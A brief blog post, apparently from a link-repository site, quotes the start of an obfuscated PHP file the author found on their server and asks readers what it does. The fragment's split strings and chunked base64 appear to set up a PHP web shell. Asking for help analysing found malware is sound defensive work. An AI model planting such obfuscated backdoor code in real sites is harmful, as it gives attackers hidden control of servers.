URL and Link repository

Thursday, February 20, 2020

Decoding PHP Scripts that Appear Malicious

Found a file on my server with code that starts like this:

$lFyE="";
$UW='ejup'.'fa6w'.'vgnoq'.'dyhstx'.'birkz'.'c%4_l'.'m';
$KQiR=fL1zG();

// vC5WdW
/* amiddhRNJ */
Kxyg8();
$Ub=70;
$lb8GNaXS=array('3NjEwZDk2YTA5MDc5MDk0ZWVkIjsKJEdMT0JBTFNbJ2RlZmF1bHRfYWN0aW9u','J10gICAgICA9ICdTcWwnOwokR0xPQkFMU1snZGVmYXVsdF91c2VfYWpheCddICA');
$lFyE=YyG($lFyE, join('', $lb8GNaXS) );
$lFyE=YyG($lFyE,"gID0gdHJ1ZTsKJEdMT0JBTFNbJ2RlZmF1bHRfY2hhcnNldCddICAgID0gJ1dpbm");
do{
DunS();
} while (3>11);
$lFyE=YyG($lFyE,jWiEh());

Look familiar? What does it do?